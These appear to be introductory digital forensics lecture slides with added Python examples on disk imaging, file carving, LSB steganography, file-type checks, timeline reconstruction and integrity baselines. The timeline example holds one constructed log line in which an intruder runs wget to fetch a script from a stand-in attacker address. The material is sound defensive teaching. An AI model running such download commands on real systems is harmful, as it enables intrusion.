1 of 31

Introduction to Digital Forensics

Week 1

2 of 31

What is Digital Forensics?

  • Emerging discipline in computer security
    • Often dismissed as “voodoo science”
    • No standards, little research
  • Investigation that takes place after an incident has happened
  • Try to answer questions: Who, what, when, where, why, and how

3 of 31

Types of investigations

  • Determine what the incident was and get back to a working state
  • Internal investigation
    • Should be based on IR policy
    • May lead to criminal investigation
  • Criminal investigation
  • Support for “real world” investigations

4 of 31

Typical investigation phases

  1. Acquisition
  2. Recovery
  3. Analysis
  4. Presentation

5 of 31

Phase 1: Acquisition

  • Analogous to crime scene in the “real world”
  • Goal is to recover as much evidence as possible without altering the crime scene
  • Investigator should document as much as possible
  • Maintain Chain of Custody

6 of 31

Acquisition (2)

  • Determine whether an incident actually happened
  • What kind of system is to be investigated?
    • Can it be shut down?
    • Does it have to keep operating?
  • Are there policies governing the handling of the incident?
  • Is a warrant needed?

7 of 31

Acquisition (3)

  • Get the most fleeting information first (order of volatility)
    • Running processes
    • Open sockets and network connections
    • Memory
    • Storage media
  • Create bit-for-bit copies of the evidence (imaging) and hash both original and copy so later copies can be verified
  • If possible, lock up the original system in the evidence locker
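
The imaging step above, written out as an added example (not part of the slides and not the code of any of the tools they list). It mimics what `dd conv=noerror,sync` does on a drive with an unreadable sector: the bad block is zero-filled so all later data keeps its offset, the block number is recorded, and the hash of exactly what was written becomes the reference value for the chain of custody. The `FaultyMedia` class, the 2048-byte "drive" contents and the examiner name are constructed for the demo.

```python
import hashlib
import io
import json
from datetime import datetime, timezone

BLOCK_SIZE = 512  # one sector per read, so a single bad sector costs only 512 bytes of evidence


class FaultyMedia:
    """Constructed stand-in for a seized drive: sectors listed in bad_blocks raise
    I/O errors on read, everything else is served from an in-memory byte string."""

    def __init__(self, data, bad_blocks=()):
        self.data = data
        self.bad = set(bad_blocks)
        self.pos = 0

    def seek(self, offset):
        self.pos = offset

    def read(self, n):
        if self.pos // BLOCK_SIZE in self.bad:
            raise OSError(5, "Input/output error")
        chunk = self.data[self.pos:self.pos + n]
        self.pos += len(chunk)
        return chunk


def image_media(src, dst, total_size, block_size=BLOCK_SIZE):
    """Bit-for-bit copy of src into dst, behaving like `dd conv=noerror,sync`:
    an unreadable block is replaced by zeros so every later byte keeps its
    original offset, and the block number goes into the acquisition report.
    total_size is what the device reports (e.g. blockdev --getsize64).
    The hash covers exactly the bytes written to the image."""
    digest = hashlib.sha256()
    bad_blocks = []
    offset = 0
    while offset < total_size:
        want = min(block_size, total_size - offset)
        src.seek(offset)
        try:
            chunk = src.read(want)
        except OSError:
            bad_blocks.append(offset // block_size)
            chunk = b"\x00" * want
        dst.write(chunk)
        digest.update(chunk)
        offset += want
    return {"sha256": digest.hexdigest(), "bytes": offset, "bad_blocks": bad_blocks}


def verify_image(image_bytes, expected_sha256):
    """Re-hash a copy (before analysis, and again before court) and compare it with
    the acquisition hash; any mismatch means the copy is not the evidence."""
    return hashlib.sha256(image_bytes).hexdigest() == expected_sha256


def custody_record(examiner, item, result):
    """One chain-of-custody entry: who imaged what, when (UTC), with which result."""
    entry = {"examiner": examiner, "item": item,
             "acquired_utc": datetime.now(timezone.utc).isoformat(timespec="seconds")}
    entry.update(result)
    return json.dumps(entry, sort_keys=True)


def demo():
    data = bytes(range(256)) * 8                   # constructed 2048-byte "drive": 4 sectors
    drive = FaultyMedia(data, bad_blocks=[2])      # sector 2 is unreadable
    image = io.BytesIO()
    result = image_media(drive, image, total_size=len(data))
    return result, image.getvalue()


if __name__ == "__main__":
    result, image = demo()
    print(custody_record("J. Doe", "drive S/N 0000 (constructed)", result))
    print("verifies:", verify_image(image, result["sha256"]))
```

The report lists sector 2 as bad; an examiner who later finds 512 zero bytes at that offset knows they are a gap in the acquisition, not data the suspect wrote. Real imaging should also be done through a write blocker and the hash of the original media recorded alongside that of the image.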

8 of 31

Phase 2: Recovery

  • Goal is to extract data from the acquired evidence
  • Always work on copies, never the original
    • Must be able to repeat entire process from scratch
  • Data, deleted data, “hidden” data

9 of 31

File systems

  • Get files and directories
  • Metadata
    • User IDs
    • Timestamps (MAC times: last modified, accessed, and changed/created)
    • Permissions, …
  • Some deleted files may be recovered
  • Slack space

10 of 31

File deletion

  • Most file systems only remove the directory entry and mark the blocks as free; the data blocks themselves are not overwritten.
  • Unless the blocks get reallocated, the file may be reconstructed
    • The earlier, the better the chances
    • Depending on fragmentation, only partial reconstruction may be possible

11 of 31

Slack space

  • Unallocated blocks (strictly not slack space, but they hold the same kind of leftover data)
    • A suspect can also mark free blocks as allocated or bad so the file system never reuses them, and hide data there
  • Unused space at the end of a file’s last block when the file doesn’t end on a block boundary (file slack)
  • Unused space in file system data structures
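
The two previous slides (file deletion and slack space) on a toy file system, as an added example that is not part of the slides: `delete()` only drops the directory entry and frees the allocation bits, so a header search over unallocated blocks recovers the whole file; once one block is reused the header is gone and only the tail survives, while the new file's last block carries the old content as slack. The 16-byte blocks, contiguous allocation and the file contents are constructed for illustration.

```python
BLOCK_SIZE = 16  # toy block size; real file systems use 512 bytes to several KiB


class ToyFS:
    """Minimal contiguous-allocation file system (constructed for illustration).

    Like most real file systems, delete() only drops the directory entry and
    frees the allocation bits; the data blocks are left untouched."""

    def __init__(self, n_blocks=8):
        self.blocks = bytearray(BLOCK_SIZE * n_blocks)
        self.allocated = [False] * n_blocks
        self.directory = {}  # name -> (first_block, length_in_bytes)

    @staticmethod
    def _blocks_needed(length):
        return max(1, (length + BLOCK_SIZE - 1) // BLOCK_SIZE)

    def _find_free_run(self, n):
        run = 0
        for i, used in enumerate(self.allocated):
            run = 0 if used else run + 1
            if run == n:
                return i - n + 1
        raise OSError("no space left on device")

    def write(self, name, data):
        n = self._blocks_needed(len(data))
        first = self._find_free_run(n)
        start = first * BLOCK_SIZE
        # Only len(data) bytes are overwritten. The rest of the last block keeps
        # whatever the previous owner left there: that is the file slack.
        self.blocks[start:start + len(data)] = data
        for b in range(first, first + n):
            self.allocated[b] = True
        self.directory[name] = (first, len(data))

    def delete(self, name):
        first, length = self.directory.pop(name)
        for b in range(first, first + self._blocks_needed(length)):
            self.allocated[b] = False  # blocks are freed, NOT wiped

    def read(self, name):
        first, length = self.directory[name]
        start = first * BLOCK_SIZE
        return bytes(self.blocks[start:start + length])

    def slack(self, name):
        """Bytes between the logical end of the file and the end of its last block."""
        first, length = self.directory[name]
        end = first * BLOCK_SIZE + length
        last = (first + self._blocks_needed(length)) * BLOCK_SIZE
        return bytes(self.blocks[end:last])

    def carve(self, magic):
        """Scan runs of unallocated blocks for a known header and return what
        follows it in that run (trailing NUL padding stripped). A block that
        has been reallocated since deletion is no longer part of the run, so
        the result shrinks to a partial file once reuse starts."""
        found = []
        i, n = 0, len(self.allocated)
        while i < n:
            if self.allocated[i]:
                i += 1
                continue
            j = i
            while j < n and not self.allocated[j]:
                j += 1
            run = bytes(self.blocks[i * BLOCK_SIZE:j * BLOCK_SIZE])
            pos = run.find(magic)
            if pos >= 0:
                found.append(run[pos:].rstrip(b"\x00"))
            i = j
        return found


def demo():
    fs = ToyFS(n_blocks=4)
    fs.write("codes.txt", b"SECRET: launch code is 7731")  # 27 bytes: blocks 0 and 1
    fs.delete("codes.txt")
    early = fs.carve(b"SECRET:")      # nothing reused yet: full recovery
    fs.write("note.txt", b"hi")       # reuses block 0, overwriting 2 bytes of it
    late = fs.carve(b"SECRET:")       # header gone: carving by header fails
    return {
        "recovered_early": early,
        "recovered_late": late,
        "note_content": fs.read("note.txt"),
        "note_slack": fs.slack("note.txt"),  # remains of codes.txt inside note.txt's last block
        "leftover": fs.carve(b"ode is"),     # tail of codes.txt still in unallocated block 1
    }
```

The same carving idea (search unallocated space for known headers such as those of JPEG or PDF files) is what recovery tools do on real images; fragmentation and reuse are why they so often return partial files.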

12 of 31

Steganography

  • Data hidden in other data
  • Unused or irrelevant locations are used to store information
  • Most common in images, but may also be used on executable files, metadata, file system slack space
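
A worked example of the image case, added here and not part of the slides: the message is hidden in the least significant bit of each pixel, a location that is irrelevant to how the picture looks. The 256-byte grayscale "cover" is a constructed gradient, not a real image, and the one-byte length prefix is this example's own convention. The last function shows the kind of statistical clue that locates such data, because no pixel changes by more than 1 out of 255 and inspection by eye finds nothing.

```python
# Constructed 8-bit grayscale "image": 256 pixels of a repeating gradient, not a real picture.
COVER = bytes((i * 4) % 256 for i in range(256))


def _bits(data):
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def embed(cover, message):
    """Store a one-byte length followed by the message in the least significant
    bit of consecutive cover bytes. Each pixel changes by at most 1 of 255."""
    payload = bytes([len(message)]) + message
    if len(message) > 255 or len(payload) * 8 > len(cover):
        raise ValueError("message does not fit in the cover")
    out = bytearray(cover)
    for i, bit in enumerate(_bits(payload)):
        out[i] = (out[i] & 0xFE) | bit
    return bytes(out)


def _byte_at(stego, k):
    value = 0
    for j in range(8):
        value = (value << 1) | (stego[k * 8 + j] & 1)
    return value


def extract(stego):
    """Inverse of embed(); only works if you already know this scheme was used."""
    length = _byte_at(stego, 0)
    return bytes(_byte_at(stego, k) for k in range(1, length + 1))


def max_pixel_change(cover, stego):
    return max(abs(a - b) for a, b in zip(cover, stego))


def lsb_ratio(data):
    """Fraction of bytes with the LSB set. The smooth gradient COVER has every
    LSB clear; after embedding, the used region looks random. Statistics like
    this, not eyeballing, are how stego is hunted in practice."""
    return sum(b & 1 for b in data) / len(data)
```

Real tools use the same principle on colour channels of real photographs, where the LSBs are already noisy and the statistical test has to be far more careful than this one.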

13 of 31

Encrypted data

  • Depending on the encryption method, it may be infeasible to get at the information.
  • Locating the keys (e.g. in memory, swap, or on disk) is often a better approach.
  • In some jurisdictions a suspect may be compelled by law to reveal the keys.

14 of 31

Recovery (cont.)

  • Locating hidden or encrypted data is difficult and might even be impossible.
  • Investigator has to look at other clues:
    • Steganography software
    • Crypto software
    • Command histories

15 of 31

File residue

  • Even if a file is completely deleted from the disk, it might still have left a trace:
    • Web cache
    • Temporary directories
    • Old data blocks left behind when a file was moved (copied, then deleted)
    • Memory

16 of 31

Phase 3: Analysis

  • Methodology differs depending on the objectives of the investigation:
    • Locate contraband material
    • Reconstruct events that took place
    • Determine if a system was compromised
    • Authorship analysis

17 of 31

Contraband material

  • Locate specific files
    • Databases of illegal pictures
    • Stolen property
  • Determine if existing files are illegal
    • Picture collections
    • Music or movie downloads

18 of 31

Locating material

  • Requires specific knowledge of the file system and OS.
  • Data may be encrypted, hidden, obfuscated
  • Obfuscation:
    • Misleading file suffix
    • Misleading file name
    • Unusual location
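
A check for the first two obfuscation techniques, added as an example that is not part of the slides: compare what the file extension claims against the type named by the file's leading bytes (its magic number). The signature table holds a few well-known headers; the file names and contents are constructed. Files with no known header get no verdict rather than a false alarm.

```python
# Well-known leading bytes ("magic numbers") of common file types.
SIGNATURES = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF8": "gif",
    b"%PDF-": "pdf",
    b"\x7fELF": "elf",
    b"MZ": "exe",
    b"PK\x03\x04": "zip",
    b"\x1f\x8b": "gz",
}

# Extensions that legitimately carry one of the formats above.
EXTENSION_ALIASES = {
    "jpeg": "jpg", "jpe": "jpg",
    "docx": "zip", "xlsx": "zip", "jar": "zip", "apk": "zip",
    "dll": "exe", "so": "elf", "tgz": "gz",
}


def identify(data):
    """Return the type named by the file header, or None if the header is unknown."""
    for magic, kind in sorted(SIGNATURES.items(), key=lambda kv: -len(kv[0])):
        if data.startswith(magic):
            return kind
    return None


def check_name(name, data):
    """Compare what the extension claims with what the header says."""
    base = name.rsplit("/", 1)[-1]
    ext = base.rsplit(".", 1)[1].lower() if "." in base.lstrip(".") else ""
    claimed = EXTENSION_ALIASES.get(ext, ext)
    actual = identify(data)
    return {
        "name": name,
        "claimed": claimed,
        "actual": actual,
        "suspicious": actual is not None and actual != claimed,
    }


def find_mismatches(files):
    """files: mapping of path -> first bytes of content. Returns the paths whose
    header contradicts the extension, which is where a renamed binary or a
    disguised document hides."""
    return sorted(p for p, data in files.items() if check_name(p, data)["suspicious"])


# Constructed sample contents (headers only; the rest of each file is irrelevant here).
SAMPLE_FILES = {
    "pictures/vacation.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF",
    "docs/readme.txt": b"\x7fELF\x02\x01\x01\x00",       # an ELF binary renamed to look like text
    "docs/report.doc": b"%PDF-1.4\n%\xe2\xe3\xcf\xd3",    # a PDF wearing a .doc suffix
    "docs/archive.docx": b"PK\x03\x04\x14\x00",           # fine: a docx really is a zip
    "notes/plain.txt": b"shopping list\n",                # no known header: no verdict
    "tmp/.cache": b"MZ\x90\x00\x03\x00",                  # Windows executable with no extension at all
}
```

Run over a whole image this is a cheap first pass; `file(1)` does the same job with a far larger signature database, and the results still have to be reviewed by hand.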

19 of 31

Event reconstruction

  • Utilize system and external information
    • Log files
    • File timestamps
    • Firewall/IDS information
  • Establish time line of events

20 of 31

Time issues

  • Granularity of time keeping
    • Can’t order events that occur in the same time interval
  • Multiple systems:
    • Different clocks
    • Clock drift
  • E-mail headers and time zones
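
The timeline construction of the previous slide together with the clock problems of this one, as an added example that is not part of the slides. Three constructed sources are merged: syslog lines with no year and no time zone from a host whose clock was measured 37 seconds fast, firewall records already in UTC, and an e-mail `Date:` header with its own offset. Every timestamp is converted to UTC and skew-corrected before sorting; two events then land in the same second, which the one-second log granularity cannot order. The year, time zone and skew values are assumptions for the demo.

```python
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime

# All records below are constructed for the example; they do not come from a real case.
YEAR = 2004                                      # syslog omits the year; assumed from the case file
SYSLOG_LOCAL_TZ = timezone(timedelta(hours=-5))  # assumption: host logs local time (UTC-5), no zone marker
SYSLOG_SKEW = timedelta(seconds=37)              # assumption: host clock measured 37 s ahead of NTP at seizure
SYSLOG = [
    "Mar  3 14:22:36 web1 sshd[811]: Accepted password for admin from 203.0.113.7 port 51022",
    "Mar  3 14:22:41 web1 sudo: admin : COMMAND=/usr/bin/wget http://203.0.113.7/x.sh",
]
FIREWALL = [  # perimeter device already logging in UTC, ISO 8601
    "2004-03-03T19:21:58Z ALLOW TCP 203.0.113.7:51022 -> 192.0.2.10:22",
    "2004-03-03T19:22:04Z ALLOW TCP 192.0.2.10:44012 -> 203.0.113.7:80",
]
MAIL_DATE = "Wed, 03 Mar 2004 21:22:30 +0200"  # Date: header of an e-mail found in the mailbox


def parse_syslog(line, year=YEAR, local_tz=SYSLOG_LOCAL_TZ, skew=SYSLOG_SKEW):
    """Classic syslog stamp: no year, no zone. Attach both, then remove the measured clock skew."""
    stamp, rest = line[:15], line[16:]
    local = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S").replace(tzinfo=local_tz)
    return {"ts": local.astimezone(timezone.utc) - skew, "source": "syslog", "event": rest}


def parse_firewall(line):
    stamp, rest = line.split(" ", 1)
    ts = datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"ts": ts, "source": "firewall", "event": rest}


def parse_mail_date(header):
    """An RFC 2822 Date: carries its own offset; normalise it to UTC like everything else."""
    return {"ts": parsedate_to_datetime(header).astimezone(timezone.utc),
            "source": "mail", "event": "Date: header of suspicious e-mail"}


def build_timeline():
    events = [parse_syslog(l) for l in SYSLOG]
    events += [parse_firewall(l) for l in FIREWALL]
    events.append(parse_mail_date(MAIL_DATE))
    # Sort on corrected UTC time; the source name only makes ties deterministic,
    # it does not mean the firewall event really came first.
    events.sort(key=lambda e: (e["ts"], e["source"]))
    return events


def unordered_groups(timeline):
    """Events whose corrected timestamps share a second. One-second log granularity
    cannot say which happened first; the analyst needs other evidence for that."""
    groups = {}
    for e in timeline:
        groups.setdefault(e["ts"], []).append(e)
    return [g for g in groups.values() if len(g) > 1]


def render(timeline):
    return [f'{e["ts"].strftime("%Y-%m-%d %H:%M:%S")}Z {e["source"]:8} {e["event"]}' for e in timeline]


if __name__ == "__main__":
    print("\n".join(render(build_timeline())))
```

Without the skew correction the `wget` command would appear 37 seconds after the outbound HTTP connection it caused, an impossible order that would wrongly suggest a second actor or a missing log line.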

21 of 31

The needle in the haystack

  • Locating files:
    • Storage capacity approaches the terabyte range
    • Potentially millions of files to investigate
  • Event reconstruction:
    • Dozens or hundreds of events per second
    • Only the most recent MAC times are stored; earlier values are overwritten
    • Insufficient logging

22 of 31

Compromised system

  • If possible, compare against a known good state
    • Tripwire (file integrity database)
    • Databases of known “good” files
  • Look for unusual file MAC times
  • Look for open or listening network connections (backdoors, trojans)
  • Look for files in unusual locations
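
A Tripwire-style comparison against a known good state, as an added example that is neither the slides' content nor Tripwire's own code. A baseline of hashes and metadata is taken, then the constructed scenario trojans a binary while putting its timestamps back and drops a file in an odd place; the comparison catches the content change even though size and mtime look untouched, which is why a hash database beats looking at MAC times alone. The directory layout and file contents are constructed in a temporary directory.

```python
import hashlib
import os
import stat
import tempfile


def hash_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Tripwire-style database: content hash plus the metadata worth comparing for every regular file."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks, devices etc. would need their own handling
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            baseline[rel] = {
                "sha256": hash_file(path),
                "mode": stat.S_IMODE(st.st_mode),
                "size": st.st_size,
                "mtime": st.st_mtime_ns,
            }
    return baseline


def compare(baseline, current):
    """Report files that appeared, vanished or changed since the baseline. A content
    change is flagged even when size and mtime look untouched: timestamps can be
    reset by an intruder, the hash cannot be faked."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = {}
    for rel in sorted(set(baseline) & set(current)):
        diffs = [k for k in ("sha256", "mode", "size", "mtime") if baseline[rel][k] != current[rel][k]]
        if diffs:
            changed[rel] = diffs
    return {"added": added, "removed": removed, "changed": changed}


def _put(root, rel, data, mode=0o755):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)
    os.chmod(path, mode)
    return path


def demo():
    """Constructed scenario: a trojaned bin/login with its timestamps put back, plus a dropped file."""
    with tempfile.TemporaryDirectory() as root:
        _put(root, "bin/ls", b"ls v1")
        login = _put(root, "bin/login", b"login v1")
        _put(root, "etc/passwd", b"root:x:0:0::/root:/bin/sh\n", 0o644)
        baseline = build_baseline(root)

        st = os.stat(login)
        with open(login, "wb") as f:
            f.write(b"login v2")                                # same length as the original
        os.utime(login, ns=(st.st_atime_ns, st.st_mtime_ns))   # "timestomp" the mtime back
        _put(root, "tmp/.x", b"\x7fELFpayload")                 # dropped file in an unusual place

        current = build_baseline(root)
        return compare(baseline, current)
```

Two caveats a practitioner would add: the baseline must come from a trusted source (read-only media or a database made before the compromise, as the slide says), and the inode change time (ctime) cannot be reset with `utime`, so it is worth recording as well.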

23 of 31

Unknown executables

  • Run them in a constrained environment
    • Dedicated system
    • Sandbox
    • Virtual machine
  • Might be necessary to disassemble and decompile
    • May take weeks or months

24 of 31

Authorship analysis

  • Determine who, or what kind of person, created a file.
    • Programs (viruses, Trojans, sniffers/loggers)
    • E-mails (Blackmail, Harassment, Information leaks)
  • If actual person cannot be determined, just determining the skill level of the author may be important.

25 of 31

Phase 4: Presentation

  • An investigator who performed the analysis may have to appear in court as an expert witness.
  • For internal investigations, a report or presentation may be required.
  • Challenge: present the material in simple terms so that a jury or CEO can understand it.

26 of 31

Forensics Tools

  • Acquisition
    • dd, pdd (dd for Palm devices)
    • SafeBack, …
  • Recovery
    • EnCase
    • TCT (The Coroner’s Toolkit) and The Sleuth Kit
  • Analysis
    • ?
  • Presentation
    • ?

27 of 31

DF Investigator Profile

  • Understanding of relevant laws
  • Knowledge of file systems, OS, and applications
    • Where are the logs, what is logged?
    • What are possible obfuscation techniques?
    • What programs and libraries are present on the system and how are they used?
  • Know what tools exist and how to use them
  • Be able to explain things in simple terms

28 of 31

Future in DF

  • The need for standards
    • Acquisition procedure: develop step-by-step instructions to be followed
    • Certification
      • Investigators
      • Tools
      • Operating Systems

29 of 31

Future in DF (2)

  • Research
    • Create more meaningful audit data
    • Ensure integrity and availability of audit data
    • Privacy and Digital Forensics
    • Develop detection techniques
    • Develop automation processes

30 of 31

Future in DF (3)

  • Documentation
    • File systems
      • Over 50 different FS currently in use
      • Most are poorly documented
    • Malware
      • “fingerprint” of bad programs
    • Good system state
      • Accessible databases
      • Every OS, version, patchlevel

31 of 31

Thank You